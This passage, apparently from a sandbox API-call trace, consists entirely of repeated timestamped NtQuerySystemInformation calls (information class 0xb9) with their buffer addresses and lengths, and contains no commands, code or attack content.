ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x58, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd670, Length=0x28, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0218.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0218.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x20, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x38, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x20, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x20, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x58, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0218.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x28, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0218.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0218.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x28, ResultLength=0x0) [0218.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x28, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0218.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x20, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0219.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0219.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb18, Length=0x50, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x38, ResultLength=0x0) [0219.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x28, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x28, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x28, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x28, ResultLength=0x0) [0219.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0219.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x38, ResultLength=0x0) [0219.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x28, ResultLength=0x0) [0219.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x28, ResultLength=0x0) [0219.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x38, ResultLength=0x0) [0219.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0219.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0219.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0219.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x38, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0219.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x50, ResultLength=0x0) [0219.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x28, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0219.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 